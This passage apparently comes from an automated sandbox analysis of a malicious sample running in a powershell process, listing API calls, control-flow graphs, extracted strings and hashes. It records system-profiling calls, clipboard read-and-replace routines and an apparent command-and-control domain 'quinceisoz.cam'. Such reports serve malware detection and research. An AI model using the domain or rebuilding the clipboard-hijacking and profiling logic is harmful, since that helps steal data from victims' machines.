                                                        • CoCreateInstance.OLE32(?,00000000,00000001,?,00000000), ref: 0043B4D3
                                                        • SysAllocString.OLEAUT32(17691566), ref: 0043B556
                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043B594
                                                        • SysAllocString.OLEAUT32(04560662), ref: 0043B5F4
                                                        • SysAllocString.OLEAUT32(18561A62), ref: 0043B6AD
                                                        • VariantInit.OLEAUT32(?), ref: 0043B720
                                                        • VariantClear.OLEAUT32(?), ref: 0043B888
                                                        • SysFreeString.OLEAUT32(?), ref: 0043B8A6
                                                        • SysFreeString.OLEAUT32 ref: 0043B8B2
                                                        • SysFreeString.OLEAUT32(?), ref: 0043B8B8
                                                        • SysFreeString.OLEAUT32(00000000), ref: 0043B8C5
                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043B8FA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                        • String ID: -*$J>V<$R.P,$g&D$$k"j $w6D4$y;
                                                        • API String ID: 1341229144-2211161529
                                                        • Opcode ID: 50dcc2c4718d1eed07f1273bd04584a57db75b59b3f13f7d3ab55c1e73c68238
                                                        • Instruction ID: efabbab96d69223aee76afd964a0dd9c41cc1c2d0b34b92621560361ec58ab92
                                                        • Opcode Fuzzy Hash: 50dcc2c4718d1eed07f1273bd04584a57db75b59b3f13f7d3ab55c1e73c68238
                                                        • Instruction Fuzzy Hash: B832DB716083419BD314CF28C895B5BBBE5EFC9318F14892DE6E9CB391D778D8098B86

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 556 410f56-410f74 557 410f79-410f87 556->557 557->557 558 410f89 557->558 559 410f8b-410f8e 558->559 560 410f90-410fcc 559->560 561 410fce-411009 call 4018d0 559->561 560->559 564 41100e-41101c 561->564 564->564 565 41101e 564->565 566 411020-411023 565->566 567 411025-411054 566->567 568 411056-411080 call 4018d0 566->568 567->566 572 411082-4110cb call 414700 568->572 573 411084-411088 568->573 581 4110cd 572->581 582 4110cf-411116 call 408220 call 40ab20 572->582 574 411a8c 573->574 577 412687 574->577 578 412689-41268c call 401f60 577->578 588 40f131-41269d 578->588 589 40f13a-40f168 call 401f70 578->589 581->582 593 41111b-411129 582->593 597 40f16d-40f17b 589->597 593->593 596 41112b 593->596 598 41112d-411130 596->598 597->597 599 40f17d 597->599 600 411132-41116a 598->600 601 41116c-41118a call 4018d0 598->601 602 40f17f-40f182 599->602 600->598 608 4111db-411209 call 414700 601->608 609 41118c-4111b3 call 414700 601->609 603 40f184-40f1c6 602->603 604 40f1c8-40f1f1 call 401e60 602->604 603->602 612 40f1f3-40f218 604->612 613 40f1f5 604->613 621 41120b 608->621 622 41120d-41129b call 408220 call 40ab20 RtlExpandEnvironmentStrings 608->622 618 4111b5 609->618 619 4111b7-4111d6 call 408220 call 40ab20 609->619 620 40f21d-40f22b 612->620 613->578 618->619 619->608 620->620 624 40f22d 620->624 621->622 635 4112a0-4112ae 622->635 627 40f22f-40f232 624->627 630 40f234-40f264 627->630 631 40f266-40f2b1 call 4019d0 627->631 630->627 631->577 638 40f2b7 631->638 635->635 637 4112b0-4112b7 635->637 639 4112b9-4112bc 637->639 638->577 640 4112e7-4112f8 639->640 641 4112be-4112e5 639->641 642 411309-411322 640->642 643 4112fa-411304 call 408230 640->643 641->639 645 411324 642->645 646 411326-411381 call 408220 642->646 651 411a8a 643->651 645->646 653 4113a3-4113cb call 408230 646->653 654 411383-41139e call 408230 * 2 646->654 651->574 662 4113d0-4113de 653->662 667 411a88 654->667 662->662 664 4113e0 662->664 666 4113e2-4113e5 664->666 668 411434-41145b call 4018d0 666->668 669 4113e7-411432 666->669 667->651 672 4114ab-4114c9 668->672 673 41145d-41147e call 414700 668->673 669->666 675 4114ce-4114dc 672->675 678 411480 673->678 679 411482-4114a6 call 408220 call 40ab20 673->679 675->675 677 4114de 675->677 680 4114e0-4114e3 677->680 678->679 679->672 682 411569-4115b7 call 401bd0 680->682 683 4114e9-411564 680->683 688 4115ba-4115c8 682->688 683->680 688->688 689 4115ca-4115cc 688->689 690 4115d0-4115d3 689->690 691 4115f2-411613 call 401ae0 690->691 692 4115d5-4115f0 690->692 695 411954-4119c3 call 408dd0 call 4155c0 691->695 696 411619-41164d call 401f60 691->696 692->690 704 4119c8-4119dc call 409a60 695->704 702 411651-411675 call 408220 696->702 703 41164f 696->703 708 4116a2-4116ab 702->708 709 411677-41167e 702->709 703->702 713 411a21-411a50 call 408230 * 2 704->713 714 4119de-4119f8 704->714 712 4116ad-4116af 708->712 711 411680-41168c call 414840 709->711 726 41168e-4116a0 711->726 717 4116b1 712->717 718 4116b6-4116f1 call 401f70 712->718 746 411a52-411a55 call 408230 713->746 747 411a5a-411a67 713->747 720 411a15-411a1d call 408230 714->720 721 4119fa-4119fc 714->721 717->695 732 4116f6-411704 718->732 720->713 730 4119fe-411a0f call 4149e0 721->730 726->708 741 411a11 730->741 742 411a13 730->742 732->732 736 411706 732->736 739 411708-41170b 736->739 743 41173b-411772 call 4018d0 739->743 744 41170d-411739 739->744 741->730 742->720 752 411777-411782 743->752 744->739 746->747 750 411a69-411a75 call 408230 747->750 751 411a7a-411a86 call 408eb0 747->751 750->751 751->667 752->752 755 411784-411786 752->755 758 41178d-411790 755->758 759 411792-4117a7 758->759 760 4117a9-4117e2 call 4018d0 758->760 759->758 763 4117e4-4117e7 760->763 764 411813-411859 call 401bd0 763->764 765 4117e9-411811 763->765 768 41185e-41186c 764->768 765->763 768->768 769 41186e 768->769 770 411870-411873 769->770 771 4118d2-41194f call 401bd0 call 414860 770->771 772 411875-4118d0 770->772 771->712 772->770
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: +$B$K$R$T$T$]$c$k$t${
                                                        • API String ID: 0-1251224861
                                                        • Opcode ID: 8a933165b6b8387d1d870940ada7ce90d70d06ae8345592fe5139380eb04d388
                                                        • Instruction ID: 58496473fbeb39b6b054518c7a37bbd0ece468daa964df666678063d2829f8b8
                                                        • Opcode Fuzzy Hash: 8a933165b6b8387d1d870940ada7ce90d70d06ae8345592fe5139380eb04d388
                                                        • Instruction Fuzzy Hash: 1F62C171A0C7808BD7249B3884953EFBBE1ABD5314F194A7ED5DAC73D2D63888818B07

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNELBASE(00000001), ref: 05601032
                                                        • OpenClipboard.USER32(00000000), ref: 0560103C
                                                        • GetClipboardData.USER32(0000000D), ref: 0560104C
                                                        • GlobalLock.KERNEL32(00000000), ref: 0560105D
                                                        • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05601090
                                                        • GlobalLock.KERNEL32 ref: 056010A0
                                                        • GlobalUnlock.KERNEL32 ref: 056010C1
                                                        • EmptyClipboard.USER32 ref: 056010CB
                                                        • SetClipboardData.USER32(0000000D), ref: 056010D6
                                                        • GlobalFree.KERNEL32 ref: 056010E3
                                                        • GlobalUnlock.KERNEL32(?), ref: 056010ED
                                                        • CloseClipboard.USER32 ref: 056010F3
                                                        • GetClipboardSequenceNumber.USER32 ref: 056010F9
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3704388135.0000000005601000.00000020.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: true
                                                        • Associated: 00000013.00000002.3704318702.0000000005600000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.3704447851.0000000005602000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_5600000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                        • String ID:
                                                        • API String ID: 1416286485-0
                                                        • Opcode ID: 61f5b7120b3c14e28fa384df2c3ede522e4488cfd2d719a182a47f6a7f4b14ae
                                                        • Instruction ID: 4c4911b46ac7a0b23b542a2353a3e654448f58e320d2cb45e0787271369fcc8e
                                                        • Opcode Fuzzy Hash: 61f5b7120b3c14e28fa384df2c3ede522e4488cfd2d719a182a47f6a7f4b14ae
                                                        • Instruction Fuzzy Hash: DC21B0756142549BD72C2BB1EC0EB6B7BA8FF05785F043028F986D6290EF729800CBA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 799 424d8a-424d8f 800 424d91-424d96 799->800 801 424d98 799->801 802 424d9b-424dc2 call 408220 RtlExpandEnvironmentStrings 800->802 801->802 805 424dd1-424dd9 802->805 806 424dc9 802->806 807 424de2 805->807 808 424ddb-424de0 805->808 806->805 809 424de9-424e2a call 408220 807->809 808->809 812 424e30-424e44 809->812 812->812 813 424e46-424e4e 812->813 814 424e50-424e55 813->814 815 424e71-424e7e 813->815 818 424e60-424e6f 814->818 816 424e80-424e84 815->816 817 424ea1-424eb9 call 442e90 815->817 819 424e90-424e9f 816->819 822 424ed0-424ed8 817->822 823 424ec0-424ec7 817->823 824 42504a 817->824 825 425038-425042 817->825 826 42505f-425118 817->826 818->815 818->818 819->817 819->819 827 424ee1 822->827 828 424eda-424edf 822->828 823->822 824->826 825->824 829 425120-425141 826->829 830 424ee8-424f8f call 408220 827->830 828->830 829->829 831 425143-425155 call 421050 829->831 836 424f90-424fb4 830->836 835 42515a-42515d 831->835 836->836 837 424fb6-424fbe 836->837 838 424fc0-424fc7 837->838 839 424fe1-424fee 837->839 840 424fd0-424fdf 838->840 841 424ff0-424ff4 839->841 842 425011-425031 GetLogicalDrives call 442e90 839->842 840->839 840->840 843 425000-42500f 841->843 842->824 842->825 843->842 843->843
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00424DB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 01$PPB$sz$y$AC$RB
                                                        • API String ID: 237503144-3029882875
                                                        • Opcode ID: 0dbe63957b4fe522eb98ca4fa407102133424ceac7a2e2c0ad066726c7ad13f1
                                                        • Instruction ID: 5b4b706f445ecfe54fafddf74cfefc7061c6ac1f6677eae9a963ca4e29261c2b
                                                        • Opcode Fuzzy Hash: 0dbe63957b4fe522eb98ca4fa407102133424ceac7a2e2c0ad066726c7ad13f1
                                                        • Instruction Fuzzy Hash: A591A9B42083109BD320DF14E891A6FB7E2EF96318F45892DF1C58B392E7788945CB4B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1045 408a00-408a11 call 43f470 1048 408cd0-408cd2 ExitProcess 1045->1048 1049 408a17-408a1e call 438b60 1045->1049 1052 408a24-408a47 GetCurrentProcessId GetCurrentThreadId 1049->1052 1053 408ccb call 43fb90 1049->1053 1055 408a49-408a4b 1052->1055 1056 408a4d-408acb SHGetSpecialFolderPathW GetForegroundWindow 1052->1056 1053->1048 1055->1056 1057 408ad1-408aec 1056->1057 1058 408b65-408bca 1056->1058 1060 408af2-408b63 1057->1060 1061 408aee-408af0 1057->1061 1059 408bd0-408be9 1058->1059 1059->1059 1062 408beb-408c17 call 43e310 1059->1062 1060->1058 1061->1060 1065 408c20-408c5b 1062->1065 1066 408c94-408cad call 409fa0 1065->1066 1067 408c5d-408c92 1065->1067 1070 408cb9-408cc0 1066->1070 1071 408caf call 40cd10 1066->1071 1067->1065 1070->1053 1073 408cc2-408cc8 call 408230 1070->1073 1074 408cb4 call 40ba50 1071->1074 1073->1053 1074->1070
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00408A24
                                                        • GetCurrentThreadId.KERNEL32 ref: 00408A2D
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408A7F
                                                        • GetForegroundWindow.USER32 ref: 00408AC3
                                                        • ExitProcess.KERNEL32 ref: 00408CD2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                        • String ID: 3P16
                                                        • API String ID: 4063528623-2793485512
                                                        • Opcode ID: 07db624bd404a8944a33052a63fb7fe521cd1eee5149cf8d0e171c6975ebf44c
                                                        • Instruction ID: 4cd3e6a7f8707b15ba17179249244b82c7598acfac02e6b5f373577d2f751aa9
                                                        • Opcode Fuzzy Hash: 07db624bd404a8944a33052a63fb7fe521cd1eee5149cf8d0e171c6975ebf44c
                                                        • Instruction Fuzzy Hash: 86617B77B087044BD318AF7A8C5135BB6D35BC1310F0E813EA9C5EB7D2ED7898058299

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1091 40e290-40e2d4 call 409a60 CoUninitialize 1094 40e2e0-40e2f2 1091->1094 1094->1094 1095 40e2f4-40e318 1094->1095 1096 40e320-40e36f 1095->1096 1096->1096 1097 40e371-40e3ba 1096->1097 1098 40e3c0-40e3f1 1097->1098 1098->1098 1099 40e3f3-40e403 1098->1099 1100 40e405-40e407 1099->1100 1101 40e41b-40e42c 1099->1101 1102 40e410-40e419 1100->1102 1103 40e43b-40e446 1101->1103 1104 40e42e-40e42f 1101->1104 1102->1101 1102->1102 1106 40e448-40e44b 1103->1106 1107 40e45b-40e466 1103->1107 1105 40e430-40e439 1104->1105 1105->1103 1105->1105 1108 40e450-40e459 1106->1108 1109 40e468-40e469 1107->1109 1110 40e47b-40e483 1107->1110 1108->1107 1108->1108 1111 40e470-40e479 1109->1111 1112 40e485-40e488 1110->1112 1113 40e49b-40e4a7 1110->1113 1111->1110 1111->1111 1114 40e490-40e499 1112->1114 1115 40e4c1-40e582 1113->1115 1116 40e4a9-40e4ab 1113->1116 1114->1113 1114->1114 1118 40e590-40e5a0 1115->1118 1117 40e4b0-40e4bd 1116->1117 1117->1117 1119 40e4bf 1117->1119 1118->1118 1120 40e5a2-40e5bf 1118->1120 1119->1115 1121 40e5c0-40e5fa 1120->1121 1121->1121 1122 40e5fc-40e619 call 40ba80 1121->1122 1124 40e61e-40e635 1122->1124
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Uninitialize
                                                        • String ID: quinceisoz.cam$YD
                                                        • API String ID: 3861434553-2857351005
                                                        • Opcode ID: 0c060c09655814047a66e676f1295931433636fed9df1fd7ebc7b78c19bd6974
                                                        • Instruction ID: 200042d3710e27d3e070f64aca1da6e307d9fbb02f4ab09c0a9b16a55ec942b3
                                                        • Opcode Fuzzy Hash: 0c060c09655814047a66e676f1295931433636fed9df1fd7ebc7b78c19bd6974
                                                        • Instruction Fuzzy Hash: 73B1C170104B81DFD329CF2AD4E0662BBE0FF56310B188A9DD4D64BB96D738E816CB94
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8dc334b242a826e5b2dae496acfe67669b3cb925cdd33f05cc61466ecd24fffc
                                                        • Instruction ID: a0675b8805c7355aad90cb7b82b018e9a985ec4318174156c3abc6938aa9f39f
                                                        • Opcode Fuzzy Hash: 8dc334b242a826e5b2dae496acfe67669b3cb925cdd33f05cc61466ecd24fffc
                                                        • Instruction Fuzzy Hash: 3E8139759083419FC724CF28C8916ABB7E2EF96314F18892EE4D987391EB38DC45CB56
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(00442E6D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043FC4E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1082 42eafa-42eb58 FreeLibrary call 441660 1086 42eb60-42eb7a 1082->1086 1086->1086 1087 42eb7c-42eb8d 1086->1087 1088 42ebab-42ec03 GetComputerNameExA 1087->1088 1089 42eb8f-42eb96 1087->1089 1090 42eba0-42eba9 1089->1090 1090->1088 1090->1090
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?), ref: 0042EB01
                                                        • GetComputerNameExA.KERNELBASE(00000006,A89783EF,00000100), ref: 0042EBC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ComputerFreeLibraryName
                                                        • String ID: FGRI
                                                        • API String ID: 2904949787-1835238746
                                                        • Opcode ID: 3489e744333a1eff6027c06e3f1d1a6bf7ddcce2e5a91949d353bfd760ad56f6
                                                        • Instruction ID: 4c43c6584f7d6a87e7da7fda7030f7722148376a055158ffa5198ae001417624
                                                        • Opcode Fuzzy Hash: 3489e744333a1eff6027c06e3f1d1a6bf7ddcce2e5a91949d353bfd760ad56f6
                                                        • Instruction Fuzzy Hash: 2021A135509780CBD730CF35D8997EBBFE1ABC7315F18896DD4D8862A1DA7844058B42

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1215 42f142-42f171 1216 42f180-42f1bc 1215->1216 1216->1216 1217 42f1be-42f1c5 1216->1217 1218 42f1c7-42f1cb 1217->1218 1219 42f1db-42f543 1217->1219 1220 42f1d0-42f1d9 1218->1220 1222 42f550-42f564 1219->1222 1220->1219 1220->1220 1222->1222 1223 42f566-42f56d 1222->1223 1224 42f58b-42f597 1223->1224 1225 42f56f-42f573 1223->1225 1227 42f5b1-42f5d5 call 441660 1224->1227 1228 42f599-42f59b 1224->1228 1226 42f580-42f589 1225->1226 1226->1224 1226->1226 1232 42f5da-42f61f GetPhysicallyInstalledSystemMemory 1227->1232 1229 42f5a0-42f5ad 1228->1229 1229->1229 1231 42f5af 1229->1231 1231->1227 1233 42f620-42f63a 1232->1233 1233->1233 1234 42f63c-42f678 call 41d810 1233->1234 1237 42f680-42f6b6 1234->1237 1237->1237 1238 42f6b8-42f6bf 1237->1238 1239 42f6c1-42f6c5 1238->1239 1240 42f6db-42f6e3 1238->1240 1241 42f6d0-42f6d9 1239->1241 1242 42f6e5-42f6e6 1240->1242 1243 42f6fb-42f708 1240->1243 1241->1240 1241->1241 1246 42f6f0-42f6f9 1242->1246 1244 42f70a-42f711 1243->1244 1245 42f72b-42f782 1243->1245 1247 42f720-42f729 1244->1247 1248 42f790-42f7a4 1245->1248 1246->1243 1246->1246 1247->1245 1247->1247 1248->1248 1249 42f7a6-42f7ad 1248->1249 1250 42f7cb-42f7d8 1249->1250 1251 42f7af-42f7b3 1249->1251 1253 42f7da-42f7e1 1250->1253 1254 42f7fb-42f8bf 1250->1254 1252 42f7c0-42f7c9 1251->1252 1252->1250 1252->1252 1255 42f7f0-42f7f9 1253->1255 1256 42f8c0-42f8da 1254->1256 1255->1254 1255->1255
                                                        APIs
                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F5E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InstalledMemoryPhysicallySystem
                                                        • String ID: _
                                                        • API String ID: 3960555810-701932520
                                                        • Opcode ID: e2c93dc4bce6dc3e9f693e0243a6ea90fbf3efd499c13e3c9ed3cf9d36f399dd
                                                        • Instruction ID: ae1d6b7e4f0f455625c184d277efc3717a04e27f346c340259582ffc6fa1de08
                                                        • Opcode Fuzzy Hash: e2c93dc4bce6dc3e9f693e0243a6ea90fbf3efd499c13e3c9ed3cf9d36f399dd
                                                        • Instruction Fuzzy Hash: ABA1F87010D3D08BD7298F2994603ABBFE19FEB304F584A7ED0C997382D77985498B1A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1258 432e6a-432eae 1259 432eb3-432ec1 1258->1259 1259->1259 1260 432ec3 1259->1260 1261 432ec5-432ec8 1260->1261 1262 432eca-432f3d 1261->1262 1263 432f3f-433157 SysAllocString 1261->1263 1262->1261 1264 43315c-43316a 1263->1264 1264->1264 1265 43316c 1264->1265 1266 43316e-433171 1265->1266 1267 433173-43318e 1266->1267 1268 433190-4331d1 1266->1268 1267->1266 1270 4331db-4331f5 1268->1270
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AllocString
                                                        • String ID: 0
                                                        • API String ID: 2525500382-4108050209
                                                        • Opcode ID: 60a1d32182945f3e6bd683d721bc51bddab55c5dee7ca99375f97ed56477c2ce
                                                        • Instruction ID: 0e5d6e54db3fa66f7d5b11dce9cd9a1846fc5bba4bdbfab75d2810411b30cefa
                                                        • Opcode Fuzzy Hash: 60a1d32182945f3e6bd683d721bc51bddab55c5dee7ca99375f97ed56477c2ce
                                                        • Instruction Fuzzy Hash: 3DA1D42050DFC1CAD372CA3C885D797BFD15B67224F084B9DD0FE4A2E6C6A9610AC726

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1271 435032-435076 1272 43507b-435089 1271->1272 1272->1272 1273 43508b 1272->1273 1274 43508d-435090 1273->1274 1275 435092-4350bf 1274->1275 1276 4350c1-435254 SysAllocString 1274->1276 1275->1274 1277 435259-435264 1276->1277 1277->1277 1278 435266 1277->1278 1279 435268-43526b 1278->1279 1280 435284-4352c7 1279->1280 1281 43526d-435282 1279->1281 1283 4352d1-435300 1280->1283 1281->1279
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AllocString
                                                        • String ID: 0
                                                        • API String ID: 2525500382-4108050209
                                                        • Opcode ID: eb5065a6f61fc00f6841d1787628cb19d37d9d615586c44aaccb524bdd93efaa
                                                        • Instruction ID: 9eb203f3bbf3c999938fa52b0051975d019db84f2f5f09065ffa432bc9b0eac2
                                                        • Opcode Fuzzy Hash: eb5065a6f61fc00f6841d1787628cb19d37d9d615586c44aaccb524bdd93efaa
                                                        • Instruction Fuzzy Hash: 2B91A460108FC18DD332C73C8848797BFE06B67224F484A9DD1FA8B7E2D7A5614AD766
                                                        APIs
                                                        • GetComputerNameExA.KERNELBASE(00000006,A89783EF,00000100), ref: 0042EBC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ComputerName
                                                        • String ID: FGRI
                                                        • API String ID: 3545744682-1835238746
                                                        • Opcode ID: 3b8c8963fbf51072cf2fbca3e70ae0f88966d9cb2f35235e6959a2fb6ffc0023
                                                        • Instruction ID: e28d4fd25c2106e15d3d037d3f1690eef8bbde390f8308ead401d458878d3d60
                                                        • Opcode Fuzzy Hash: 3b8c8963fbf51072cf2fbca3e70ae0f88966d9cb2f35235e6959a2fb6ffc0023
                                                        • Instruction Fuzzy Hash: BB21D2355093808BD730CF36D8997EBBFE1ABD7315F58886DD0D98A2A1EA7840058B42
                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040DDEF
                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040DF30
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: 66aba8b16e51eabe5c497fd7ed0365ae12cbac4afaa0a8f441e4aa3005461a46
                                                        • Instruction ID: d07d8f45d5c4f2bbfc46287307464193c4c3e31656f384035070e09344caf60b
                                                        • Opcode Fuzzy Hash: 66aba8b16e51eabe5c497fd7ed0365ae12cbac4afaa0a8f441e4aa3005461a46
                                                        • Instruction Fuzzy Hash: 2941C9B4C10B40AFD370AF3D9A4B7167EB4AB05210F504B2DF9E69A6D4E331A4198BD7
                                                        APIs
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D8FD
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D922
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InitializeSecurity
                                                        • String ID:
                                                        • API String ID: 640775948-0
                                                        • Opcode ID: 6025c0c4241d48c6f527f1986b96e293406e969b2c11656e833081fa16e0889f
                                                        • Instruction ID: 754084f96867f1d2de874bd9ad04d1bb6caf9ac49d31b427ff6278fe94b539ef
                                                        • Opcode Fuzzy Hash: 6025c0c4241d48c6f527f1986b96e293406e969b2c11656e833081fa16e0889f
                                                        • Instruction Fuzzy Hash: 17E042383DD301BAFA788714EC17F5932165747F22F308315B7253E6E486E03209855D
                                                        APIs
